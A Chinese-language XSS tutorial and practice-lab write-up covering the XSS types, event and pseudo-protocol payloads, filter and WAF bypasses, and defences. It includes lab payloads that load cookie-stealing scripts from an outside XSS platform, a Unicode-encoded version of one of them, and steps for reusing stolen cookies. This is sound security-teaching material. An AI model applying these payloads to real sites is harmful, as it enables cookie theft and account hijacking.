XSS大全

2023-11-18

XSS的原理和特性

xss:将用户的输入当作前端代码执行

注入攻击的本质,是把用户输入的数据当做代码执行。

这里有两个关键条件:

第一个是用户能够控制输入

第二个是原本程序要执行的代码,拼接了用户输入的数据

html:定义了网页的结构
css:美化页面
js:可以操浏览器

XSS主要拼接的是什么

SQL注入拼接的是操作数据库的SQL语句。

XSS拼接的是网页的HTML代码,一般而言我们是可以拼接出合适的HTML代码去执行恶意的JS语句(总结:xss就是拼接恶意的HTML

xss能做什么

盗取Cookie(用的最频繁的)

获取内网ip

获取浏览器保存的明文密码

截取网页屏幕

网页上的键盘记录

xss类型:

反射型XSS (你提交的数据成功的实现了XSS,但是仅仅是对你这次访问产生了影响,是非持久型攻击)    一次性,必须手动输入恶意语句(利用条件比较的苛刻)

存储型XSS (你提交的数据成功的实现了XSS,存入了数据库,别人访问这个页面的时候就会自动触发)     持久性的,将我们输入的恶意语句存储起来,然后触发

DOM型XSS (比较复杂)基于dom对象的xss

怎么检测是否存在XSS

一般是想办法让浏览器弹窗(alert) 最经典的弹窗语句

如:<script>alert(1)</script>    

一般证明XSS是否存在,就是在正常页面传参然后构建参数让他弹窗就是存在XSS了


xss真的执行恶意代码的实际上是JS语句,那么我们一般需要构建<script></script>

(这个是定义Js的标签)

但是也是有其他方法可以执行的 javascript:

alert(1) (经典代码<a href=javascript:alert(1)>test</a>)

 Javascript实际上是一个伪协议      

伪协议不同于因特网上所真实存在的协议,如http://,https://,ftp://,     

伪协议只有关联应用能够用,比如 php://   tencent://(关联QQ)           

 javascript:伪协议实际上声明了URL的主体是任意的javascript代码       

 javascript:alert(1)

事件也是可以执行JS的:   

 例如:    οnerrοr=alert(1)   在加载文档或图像时发生错误。      

  该句的意思就是在加载文档或图像时发生错误然后会执行alert(1)         

类似的事件有很多         

常用的有 onerror、onload(成功加载执行)oninput (有输入框,输入的时候触发)


标签法:<script>alert(123)</script>
伪协议:<a href=javascript:alert(555)>555</a>
事件法:<a οnmοusemοve=alert(888)>8888</a>

xss的本质是什么

我们的传参被拼接进HTML页面,并且被执行。

xss如何执行

通过拼接恶意的html代码,js语句来执行攻击,实际上为html代码注入。

xss作用

盗用cookie,得到内网ip,获取保存的密码等

如何检测xss

通过一个经典语句<script>alert('1')</script>弹窗检测。

xss还可以通过什么来执行

通过事件,伪协议来执行

伪协议是什么

一种不同与真实协议的协议,只有关联应用才可以用(例如:javascript:alert(1))

事件是什么

这里的事件就是指js事件,通过之歌js事件来执行 例如<img src='1' οnerrοr=alert(1)/>当图片加载错误时弹窗,以此来触发执行语句

xss一般通过什么来执行

写在<script>标签内或者是事件标签触发

一定要用<来闭合吗

不一定 '和"也可以用来闭合语句

xss的过滤方法

进行转义实体编码输出,加标签,正则匹配替换

常用的事件有哪些

onerror(加载错误时触发),onload(加载成功时触发),oninput(输入框输入时触发)

如何防范xss

转义字符输出,用白名单验证、HTML实体化

xss要成功执行的条件是什么

用户可以控制输入,执行代码拼接用户输入数据

xss有几种类型

有三种,分别为反射型,存储型,DOM型

三种xss的形式的区别是什么

反射型 非持久型xss 只对本次访问有影响

存储型  持久型xss 存入数据库,访问时触发

DOM型 利用DOM对象触发的xss

反射型XSS具体使用方法

比如百度存在反射型XSS,然后你构建可以窃取Cookie的JS语句,然后传参点在URL那里,然后我们通过短链接将他变为短链接,然后发给想要获取别人信息的人。然后人家如果登陆状态访问了就会触发XSS

反射型XSS为什么很多SRC不收

因为危害比较小,需要管理员和你交互,大部分公益SRC会不收,专属的可以获得。

DOM型XSS究竟是持久型还是非持久型?

既有持久也有非持久,DOM型最简单的理解方法就是通过网页自带JS操作后造成的XSS,例如本身可能有HTML实体编码,结果我们输出点因为JS会进行解码,然后我们打了编码过的字符串,绕过了HTML实体编码造成的XSS就属于DOM型

事件型XSS是不是需要交互咧?

不一定,有些事件需要,有些不需要,例如: onload onerror 这些就不需要,我用的最喜欢的还是οnfοcus=alert(1) autofocus (获取焦点触发弹窗,然后自动触发)

事件有哪些?

HTML 事件参考手册

Xss窃取他人Cookie最简单的方法是什么?

通过XSS平台,例如XSSPT

短链接是什么?

短链接,通俗来说,就是将长的URL网址,转换为简短的网址字符串,和DNS协议有点像,提供服务的网站会在数据库里面存储短链接对应的原本URL是什么,当你访问短链接,然后那边设置了302重定向跳转到原本的长URL

XSS在什么地方可以插入?

有输入的地方就插进去

XSS一般在什么业务场景容易遇见?

重灾区:评论区、留言区、个人信息、订单信息等

针对型:站内信、网页即时通讯、私信、意见反馈

存在风险:搜索框、当前目录、图片属性等

反射型XSS靶场http://b-ref-xss-1s.lab.aqlab.cn/

首先,先随便输入看看源码的输入点在哪里

 观察输入的数据所在位置 是否能进行xss

尝试让语句闭合

首先是标签法:<script>alert(123)</script>

<h2 align=center>没有找到和&lt;script&gt;alert(123)&lt;/script&gt;相关的结果.</h2><center>
<form action=index.php method=GET>
<input name=keyword  value='&lt;script&gt;alert(123)&lt;/script&gt;'>

 &lt;script&gt;alert(123)&lt;/script&gt;

很明显<>被转义掉了

伪协议:<a href=javascript:alert(555)>555</a>

伪协议也被转义掉了,成了 &lt;a href=javascript:alert(555)&gt;555&lt;/a&gt;

只能尝试事件法


常用的有 onerror、onload(成功加载执行)oninput (有输入框,输入的时候触发)

所以用的是oninput

' οninput=alert(1) // 

页面会先从

存储型XSS

同源策略:

为什么A站点会填充A站点的Cookie,B站点会填充B站点的Cookie,他们不会相互乱窜?

同源策略:浏览器的同源策略,限制了不同源的Js,对当前页面的资源和属性的权限。同源策略保护了a.com域名下的资源不被来自其他网页的脚本读取或篡改

 所谓同源:需要同 域名/host、端口、协议

持久型/存储型XSS:

嵌入到web页面的恶意HTML会被存储到应用服务器端,简而言之就是会被存储到数据库,等用户在打开页面时,会继续执行恶意代码,能够持续的攻击用户;

存储型xss是怎么操作的

嵌入到了web页面的恶意代码被存储到服务器上,例如你注册时候将用户昵称设置为XSS恶意代码,那么访问某些页面会显示用户名的时候就会触发恶意代码。

存储型xss是什么

提交恶意xss数据,存入数据库中,访问时触发。

存储型xss和反射型xss区别

存储型存入数据库中,可持续时间长,而反射型持续时间短,仅对本次访问有影响,反射型一般要配合社工。

存储型xss作用

用于盗取cookie,得到内网ip...和其他xss作用相同,只是触发和执行的方法原理不同

存储型xss也可以通过弹窗来验证码

可以,不过不建议

存储型xss可能出现的位置

可以插入数据的地方,比如用户注册,留言板,上传文件的文件名处,管理员可见的报错信息

满足条件

能否插入数据,插入的JS代码能否正常执行

xss平台的payload怎么使用

和弹窗一样,直接去加载,一般XSS平台也会提供攻击代码

为什么用别人的cookie就可以登录别人的账号

因为cookie是一种身份识别方式

xss平台payload作用原理

访问后触发,去加载平台给出的脚本网址

用别人的cookie登录后时效性是一直有效的么

不一定是一直有效的,有的cookie有时效性的.

如果一个xss是通过DOM的形式触发,但存储在后端,算什么类型的

算DOM型的

靶场的存储型xss为什么是在url栏里添加代码,这样不就更像反射型?

靶场的这个存储型xss是得到了错误信息,存储在后端,然后管理员(机器人)访问了有错误信息的日志,然后触发.

存储型XSS可以不用JS达到恶意效果吗?

<meta http-equiv="refresh" content="5;url=http://i.zkaq.org/">

获取到别人的Cookie怎么登陆别人用户

可以使用Burp抓包直接修改抓包数据,也可以使用浏览器修改Cookie,建议火狐浏览器

Js窃取的究竟时哪里的Cookie?

Js操纵的主体是浏览器,窃取的当然是浏览器的Cookie,所以有XSS的地方,你如果抓包改Cookie去访问,XSS是吃不到你修改过的Cookie,其实你访问的时候抓包就可以看到,第一次访问正常页面,第二次会GET传参访问XSS平台

访问XSS平台的时候有什么注意事项?

以前也搭建过XSS平台,其实后台可以看到所有用户的Cookie,当你用了别人的XSS平台其实就要注意信息泄露这个问题,而且访问XSS平台和XSS页面建议使用无痕,天知道,他们会不会在脚本里面做手脚

存储型XSS怎么预防?

XSS预防从两点出发,第一点不允许输入恶意字符,第二点不允许输出,都可以。一般常见方法是用HTML实体编码解决,过滤<>’”等符号

存储型XSS属于什么等级的漏洞?

SRC一般是中危,项目上妥妥的高危-严重,杀伤力还是挺大的

进入靶场吧

FineCMS公益软件公益软件产品介绍http://59.63.166.75:8082/

CMS看到后要想到去找这个版本的漏洞

 从百度上可以看到

简单来说,就是可通过构造URL,让后台生成错误日志,而后台对错误日志的内容写入没有进行安全检查,导致写入的内容原原本本的显示在错误日志的页面中,当管理员在后台查看错误日志时,就会触发XSS代码。

所以我们攻击的位置是URL

那就先搭建个XSS平台,网上有在线平台,可以注册一个

这里推荐以下

XSS平台-XSS安全测试平台xss8.cc提供在线xss平台,仅用于程序员测试xss攻击漏洞,切勿用于非法用途。https://xss8.cc/bdstatic.com/?callback=project&act=view&id=34526做一个项目,选择默认模块就够用了

然后就构建语句/index.php?c=mail&m=a<sCRiPt sRC=//xss8.cc/UBPC></sCrIpT>

这样就可以了

flag=zKaQ-01sdfDCo0

Dom型XSS

什么是dom

DOM,全称Document Object Model,是一个平台和语言都中立的接口,可以使程序和脚本能够动态访问和更新文档的内容、结构以及样式。

DOM型XSS

DOM型XSS其实是一种特殊类型的XSS,它是基于DOM文档对象模型的一种漏洞。

在网站页面中有许多页面的元素,当页面到达浏览器时浏览器会为页面创建一个顶级的Document object文档对象,接着生成各个子文档对象,每个页面元素对应一个文档对象,每个文档对象包含属性、方法和事件。可以通过JS脚本对文档对象进行编辑从而修改页面的元素。也就是说,客户端的脚本程序可以通过DOM来动态修改页面内容,从客户端获取DOM中的数据并在本地执行。基于这个特性,就可以利用JS脚本来实现XSS漏洞的利用。

可能触发DOM型XSS的属性

document.referer属性

window.name属性

location属性

innerHTML属性

documen.write属性

document对象属性

Body 获取文档信息

Title 通过 title 属性可以访问当前文档的标题,也可以修改当前文档的标题。

URL 该属性返回当前页面完整的 URL,也就是浏览器地址栏中的全部地址信息。

Domain 该属性返回当前文档的服务器域名。

Referrer 该属性包含着链接到当前文档的源页面的 URL。

Cookie 这个属性可以访问和设置与当前文档相关的所有 cookie。

dom对象方法

close() 关闭用document.open()方法打开输出流,并显示选定的数据。

getElementById()返回对拥有指定id的第一个对象引用。

getElementsByName()返回带有指定名称的对象集合。

GetElementsByTagName()返回带有指定标签名的对象集合。

Open()打开一个流,以收集来自任何document.write()或document.writeln()方法输出。

Write()向文档写HTML表达式或者JavaScript代码

Dom型XSS的危害:

DOM-XSS不经过服务端,只看服务端的日志和数据库,很难排查到

DOM-XSS一般是通杀浏览器的

DOM-XSS一般是被攻击的时候就执行了XSS,由于是前端DOM操作导致,很难留下痕迹

反射型XSS和储存型XSS以及Dom型XSS的特点

反射型:
交互的数据一般不会被存在数据库中,一次性,所见即所得,一般出现在查询类页面等

存储型:
交互的数据会被存在数据库中,永久性存储,一般出现在留言板,注册等页面

DOM型:
不与后台服务器产生数据交互,是一种通过DOM操作前端代码输出的时候产生的问题,大部分属于反射型

从实用的角度看存储型XSS和反射型XSS以及Dom型XSS

存储型xss最持久,而且更为隐蔽,因为是存在数据库当中的,触发的url当中没有带js或者其他的html代码,所以他的实用性更高。其次则是Dom型XSS因为它能绕过大部分浏览器的过滤,再其次才是反射型XSS反射型的xss还要深思熟虑的考虑根据浏览器去bypass各种过滤,易用性稍微差一些(注意反射型xss和dom型xss都需要在url加入js代码才能够触发)

.什么是document 和 windows 对象

document表示的是一个文档对象,window表示的是一个窗口对象,一个窗口下可以有多个文档对象。document 只是属于window 的一个子对象。

什么是非持久型什么是非持久型,Dom型xss又属于那种呢?

非持久型xss攻击:顾名思义,非持久型xss攻击是一次性的,仅对当次的页面访问产生影响。非持久型xss攻击要求用户访问一个被攻击者篡改后的链接,用户访问该链接时,被植入的攻击脚本被用户游览器执行,从而达到攻击目的。

持久型xss攻击:持久型xss,会把攻击者的数据存储在服务器端,攻击行为将伴随着攻击数据一直存在。

而Dom型xss属于有可能是持久也可能是非持久型

.通过xss打到的cookie怎么用来登录呢

通过抓包将你得到的cookie贴相应位置到里面即可,注意抓到的是什么页面的cookie就去相应页面抓包修改,不要找错页面了。

为什么在靶场后面加个1.txt就能绕waf

因为它认为.txt文件是安全的,所以可绕过,又因为它找不到1.txt这个文件,他就会解析上级目录

为什么靶场可以用native编码来绕waf

因为document.write()他可以接受native编码

.Dom型XSS的优点

避开waf

因为有些情况Dom Xss的Payload,可以通过location.hash,即设置为锚部分从#之后的部分,既能让JS读取到该参数,又不让该参数传入到服务器,从而避免waf检测。location.search也类似,它可以把部分参数放在?之后的部分。长度不限,这个很重要,关键时候!

为什么有时弹窗弹不出来

首先同学可以尝试更换浏览器,谷歌浏览器过滤反射型XSS,同学可以更换火狐之类的再做尝试。

网站可能过滤了script标签怎么测试此网站是否存在XSS

测试弹窗的语句并不只有<script>alert(1)</script>可以尝试跟换大小写,以及更换其他语句来测试

为什么通过抓包来做XSS会比直接在前端插要好

因为前端可能存在着一些代码的过滤,也可能存在一些输入长度的限制,这些一般都是前端检测,所以用burp就不会存在这些问题

测试网站是否存在XSS关键在于什么

关键看善于看网站源码,通过网站源码给你的信息来进行测试,并且要善于找输出点,这些地方都是需要重点排查的

常见XSS平台有哪些?

XSSPT     XSS8.CC   load.com

访问XSS平台的时候有什么注意事项?

以前也搭建过XSS平台,其实后台可以看到所有用户的Cookie,当你用了别人的XSS平台其实就要注意信息泄露这个问题,而且访问XSS平台和XSS页面建议使用无痕

xss作用

盗用cookie,得到内网ip,获取保存的密码等

.DOM型XSS的防御方法

DOM型XSS主要是由客户端的脚本通过DOM动态地输出数据到页面而不是依赖于将数据提交给服务器端,而从客户端获得DOM中的数据在本地执行,因而仅从服务器端是无法防御的。其防御在于:

(1) 避免客户端文档重写、重定向或其他敏感操作,同时避免使用客户端数据,这些操作尽量在服务器端使用动态页面来实现;

(2) 分析和强化客户端JS代码,特别是受到用户影响的DOM对象,注意能直接修改DOM和创建HTML文件的相关函数或方法,并在输出变量到页面时先进行编码转义,如输出到HTML则进行HTML编码、输出到<script>则进行JS编码。

为什么不建议用谷歌浏览器做dom-xss?

新版Chrome针对script context类型的domxss做了检测拦截

来来来,进靶场聊聊天

Welcome...!聊天室.http://59.63.166.75:8014/dom_xss/

直接存储型XSS,发现有waf,上来就被封了,进都进不去,只能换路径

F12看源码,发现了document.write("/dom_xss/");

document.write() 向文档写html表达式成javascript代码

在url中输入?id=1,测试页面是否接收get传参,以及接收get传参后的页面回显方式和位置

 知晓该函数利用js代码可接收Native编码,上网查找在线转码网站,将弹出注入语句转为Native代码

\u003c\u002f\u0074\u0045\u0078\u0074\u0041\u0072\u0045\u0061\u003e\u0027\u0022\u003e\u003c\u0073\u0043\u0052\u0069\u0050\u0074\u0020\u0073\u0052\u0043\u003d\u002f\u002f\u0078\u0073\u0073\u0038\u002e\u0063\u0063\u002f\u0055\u0042\u0050\u0043\u003e\u003c\u002f\u0073\u0043\u0072\u0049\u0070\u0054\u003e

 

发现没有flag,但我们点击投诉建议,在其输入框中再次尝试。

但得等等,因为我又被waf拦住了,网页也进不去了

 可以在XSS平台上看到

本文内容由网友自发贡献,版权归原作者所有,本站不承担相应法律责任。如您发现有涉嫌抄袭侵权的内容,请联系:hwhale#tublm.com(使用前将#替换为@)

XSS大全 的相关文章

  • 网络安全:绕过 MSF 的一次渗透测试

    这次渗透的主站是 一个 Discuz 3 4 的搭建 违法招 piao 网站 配置有宝塔 WAF 用 Discuz ML 3 X 的漏洞进行攻击 但是没有成功 发现主站外链会有一个发卡网 引导人们来这充值 是 某某发卡网 而且域名指向也是主
  • Vue 如何使用WebSocket与服务器建立链接 持续保持通信

    WebSocket 浏览器通过JavaScript向服务器发出建立WebSocket链接的请求 链接建立后 客户端和服务器端就可以通过TCP链接直接交互数据 WebSocket链接后可以通过 send 方法来向服务器发送数据 并通过 onn
  • 独家 | 鸿蒙(HarmonyOS)开发详细学习笔记免费分享

    前言 华为宣布 将在1月18日 在北京 上海 杭州 南京 成都 厦门 武汉 长沙 8 大城市同时召开大会 届时将揭秘鸿蒙生态和 HarmonyOS NEXT 进阶新篇章 简单的来说就是 纯血鸿蒙系统 即将彻底揭晓 鸿蒙系统自推出来以来 就一
  • windows 杀死占用端口的程序

    在Windows上 你可以使用以下命令来查找并杀死占用某个端口 如9200 的程序 打开命令提示符 Command Prompt 或者PowerShell 运行以下命令来查找占用9200端口的程序的进程ID PID netstat ano
  • addslashes() 可以安全地防止 HTML 属性中的 XSS 吗?

    我不得不开发一个以前的开发人员留下的旧网络应用程序 它使用addslashes 来防止HTML属性上的XSS 这是一个例子 这是否容易受到 XSS 攻击 有没有什么方法可以让 javascript 在 value 属性中运行 就像在 src
  • 考虑光伏出力利用率的电动汽车充电站能量调度策略研究(Matlab代码实现)

    欢迎来到本博客 博主优势 博客内容尽量做到思维缜密 逻辑清晰 为了方便读者 座右铭 行百里者 半于九十 本文目录如下 目录 1 概述 2 运行结果 3 参考文献 4 Matlab代码 数据
  • 【js学习之路】遍历数组api之 `filter `和 `map`的区别

    一 前言 数组是我们在项目中经常使用的数据类型 今天我们主要简述作用于遍历数组的api filter 和 map 的区别 二 filter和map的共同点 首先 我们主要阐述一下 filter 和 map 的共同点 api的参数都是回调函数
  • 如何在 Python 脚本中使用 Google OAuth2

    在使用 Python 脚本将视频上传到 YouTube 频道时 若希望将视频上传到第二个频道 需要解决 OAuth2 授权的问题 解决方案 创建新的 Google Cloud 项目 from google oauth2 import ser
  • 如何在 Python 脚本中使用 Google OAuth2

    在使用 Python 脚本将视频上传到 YouTube 频道时 若希望将视频上传到第二个频道 需要解决 OAuth2 授权的问题 解决方案 创建新的 Google Cloud 项目 from google oauth2 import ser
  • 以 XSS 安全方式替换 AJAX 响应中的选项

    从内部succcess我的 AJAX 响应的方法 我的目标是以 XSS 安全的方式执行以下操作 删除所有现有的options在选择框中 替换同一选择框中的选项 这是删除和替换选项的一种方法 但我对这种策略完全安全的 XSS 没有很高的信心
  • 防御 XSS 攻击?

    我对 PHP 很陌生 但我听说 XSS 漏洞很糟糕 我知道它们是什么 但如何保护我的网站 为了防止 XSS 攻击 您只需正确检查和验证您计划使用的所有用户输入的数据 并且不允许从该表单插入 html 或 javascript 代码 或者您可
  • 为什么标签 x = txtName.Text;遭受XSS攻击,如何预防?

    我有以下代码 label x txtName Text 当安全团队分析该 dll 时 他们表示可以对上述代码执行 XSS 攻击 我知道文本框Text属性并不能防止 XSS 攻击 那么我现在应该做什么 下面的修改能解决这个问题吗 label
  • 我应该采取哪些预防措施来防止用户提交的 HTML 出现 XSS?

    我计划制作一个网络应用程序 允许用户在我的网站上发布整个网页 我正在考虑使用HTML 净化器 http htmlpurifier org 但我不确定 因为 HTML Purifier 会编辑 HTLM 并且 HTML 的发布方式保持不变非常
  • 如何使用 htmlpurifier 允许传递整个文档,包括 html、head、title、body

    鉴于下面的代码 我如何使用 htmlpurifier 让整个内容通过 我想允许整个 html 文档 但 html head style title body 和 meta 被删除 我什至尝试过 config gt set Core Conv
  • 如何从 iframe 读取父页面的页面标题?

    我有一个页面调用另一个页面 在另一台服务器上 我希望该页面从父页面读取标题 这可能吗 或者这是否存在一些安全问题 您无法像这样跨服务器进行通信
  • 在 Safari/WebView 中禁用 XSS 过滤器

    我正在开发一个用于 XSS 检查的工具 使用 Webkit WebView 和 Macruby 这非常有效 只是 Safari 的 XSS 过滤器偶尔会捕获我的 URL 并拒绝执行恶意脚本 有没有办法禁用此功能 最好以编程方式禁用 经过一番
  • img src 属性中使用 javascript 进行 XSS 攻击

    一些较旧的浏览器容易受到 XSS 攻击 img src 当前版本的 IE FF Chrome 不是 我很好奇是否有浏览器容易受到类似的攻击 img src somefile js or 或其他类似的地方 somefile js 包含一些恶意
  • PHP XSS 预防白名单

    我的网站使用所见即所得编辑器 供用户更新帐户 输入评论和发送私人消息 编辑器 CKEditor 非常适合只允许用户输入有效的输入 但我担心通过 TamperData 或其他方式注入 我如何在服务器端控制这个 我需要将特定标签列入白名单 b
  • 清理 AntiXSS v3 输出中的 html 编码文本(#decimal notation)

    我想在 XSS 安全的博客引擎中发表评论 尝试了很多不同的方法 但发现非常困难 当我显示评论时 我首先使用微软AntiXss 3 0 http www codeplex com AntiXSS对整个内容进行 html 编码 然后我尝试使用白
  • 清理 html 字符串中的所有脚本

    HTML5 剪贴板很棒 但我正在寻找一种使其安全的方法 用户正在将文本 html 粘贴到我的网页中 这允许他们粘贴图像 表格等 我正在寻找一种方法 在将粘贴的内容添加到页面之前删除所有脚本 我需要删除

随机推荐

  • 设计模式概念学习

    文章目录 创建类型 单例模式 饿汉 懒汉 openbmc项目实际应用 工厂方法 简单工厂方法 openbmc项目实际应用 抽象工厂 以下为学习时对各种设计模式的简单理解 还没有深入学习和实际应用 推荐1个 很棒的网站学习设计模式 每个模式都
  • 01-windows下python爬取网页上的图片

    1 首先下载python 安装环境 pycharm anaconda的下载与安装 移步各个主页下载 一键式安装 pycharm http www jetbrains com pycharm anaconda https www anacon
  • 什么是算子?

    什么是算子 在知道什么是算子之前我们还需要知道一些其他的相关概念 大概来说 算子是一个函数空间到函数空间上的映射O X X 广义上的算子可以推广到任何空间 如内积空间等 映射 从一个拓扑空间到另一个拓扑空间的对应关系 对于每一个x 都有唯一
  • 【应用层2】Http协议

    一 简介 Http 即超文本传输协议 一种建立在 TCP 上的无状态连接 属于应用层协议 http传输的内容都是明文的 不安全的 Http 协议用于客户端与服务器端之间的通信 它规定了客户端与服务端之间的通信格式 包括请求和响应的格式 Ht
  • Springboot中配置activeMQ持久化

    一 activeMQ数据库持久化配置 ActiveMQ持久化的三种方式 我们采用数据库的方式来进行持久化 1 Memory 消息存储 基于内存的消息存储 2 基于日志消息存储方式 KahaDB是ActiveMQ的默认日志存储方式 它提供了容
  • MYSQL刷新字段:“指定字符”+年月日+三位流水号

    项目场景 项目场景 生成编号 指定字符 年月日 三位流水号 需求阐述 已经写完了生成流水号的代码 但是之前的数据并没有此类编码 所以需要把数据库新建的编码字段进行刷新 刷新数据的逻辑 根据指定字符 LSH 数据的创建时间 三位流水号进行拼接
  • 解决mysqld服务启动失败

    原因如下 1 进程占用 首先查看下mysql进程 ps aux grep mysql 有进程号占用了 kill 这个进程号 再重启服务 2 所有者和所属组为mysql 查看 usr local MySQL data mysqld pid所有
  • android功能代码--Android报表控件achartengine介绍(二)

    Android报achartengine再详细的介绍可以查看 http blog csdn net lk blog article details 7642751 在achartengine中两种创建报表的方式 1 是在Activity中直
  • ARP - Address Resolution Protocol, 地址解析协议

    1 概述 1 1 作用 ARP Address Resolution Protocol 地址解析协议 将IP 地址解析为以太网MAC 地址的协议 在局域网中 当主机或其它网络设备有数据要发送给另一个主机或设备时 它必须知道对方的网络层地址
  • 特定场景小众领域数据集之——焊缝质量检测数据集

    写这篇文章最大的初衷就是最近频繁的有很多人私信问我相关的数据集的问题 基本上都是从我前面的目标检测专栏里面的这篇文章过来的 感兴趣的话可以看下 轻量级模型YOLOv5 Lite基于自己的数据集 焊接质量检测 从零构建模型超详细教程 保姆级的
  • 例说hg(六)———— hg branch 创建分支

    开篇 branch 分支 應該也是 Hg 最重要的技能之一 在一個多人專案的開發過程中我們有時候要開發新功能 有時候是要修正某個Bug 有時候想要測試某個特異功能能不能 work 這時候我們通常都會從主 branch 再開出一條新的 bra
  • 小白的成长轨迹(二):披荆斩棘,未来可期

    大家好 我是孤焰 一名双非本科的大四学生 又是一年的1024 我坚持撰写博客已经为期一年 很感谢大家一直以来的支持 在这一年期间这位名为 孤焰 的少年又有哪些成长呢 下面便请细听分说 希望这些成长经历可以对正在看这篇文章的小可爱们有一些帮助
  • 点击echarts柱状图动态改变数据项颜色样式

    首先附上参考文章连接 https blog csdn net weixin 42870683 article details 103528254添加链接描述 今天来实现点击echarts柱状图 动态改变柱状图数据项颜色样式的案例 只要认真做
  • 向日葵的windows账号名

    向日葵的windows账号名
  • Windows11安装WSL2.0

    写这篇文章主要是记录下自己安装时的步骤 因为在网上找的一些文章无法正常安装 我安装wsl是用于在windows上运行ubuntu20 04 一 WSL2 0安装 1 启用适用于 Linux 的 Windows 子系统 2种方式第一种方式是图
  • TCP服务器—实现数据通信

    目录 前言 1 接口介绍 2 编写服务器 3 编写客户端 4 编译链接 5 测试 6 总结 前言 今天我们要介绍的是使用TCP协议实现数据通信 相比于之前写的UDP服务器实现数据信 在主体逻辑上并没有差别 客户端向服务器发送信息 服务器接受
  • 泣神曲服务器维护,泣神曲手机版_泣神曲安卓版V1.0.0预约_第一手游网

    泣神曲手游是一款玩法内容丰富的魔幻MMO动作手游 精美魔幻画面带给你极致体验 自由交易随心买卖 史诗争霸一触即发 感兴趣的小伙伴们可别错过了 泣神曲手游简介 这是一款超燃的魔幻风格的角色扮演类手机游戏 圣域激斗 开放地图场景 霸气英雄悉数登
  • 【Endnote】利用Endnote给Word的论文添加文献,根据期刊选择相应的引文和参考文献格式(根据期刊,不涉及自定义)

    版 本 介 绍 版本 Endnote x9 for mac 软件语言 英文 能下载中文的肯定更方便啊 电脑 Mac win的应该会更加简单 网上有更多攻略 正文开始 1 名词解释 在用Word完成论文后 需要为论文添加引文和参考文献 往往是
  • 当服务器无法访问,如何快速定位问题点

    工作和生活中 我们难免会遇到这样的问题 这种情况出现时 如何快速定位排查呢 一 了解什么是域名 VS IP 1 什么是域名 www baidu com 2 为什么用域名通信 不直接用IP通信 ip地址不好记忆 如 124 56 78 333
  • XSS大全

    XSS的原理和特性 xss 将用户的输入当作前端代码执行 注入攻击的本质 是把用户输入的数据当做代码执行 这里有两个关键条件 第一个是用户能够控制输入 第二个是原本程序要执行的代码 拼接了用户输入的数据 html 定义了网页的结构 css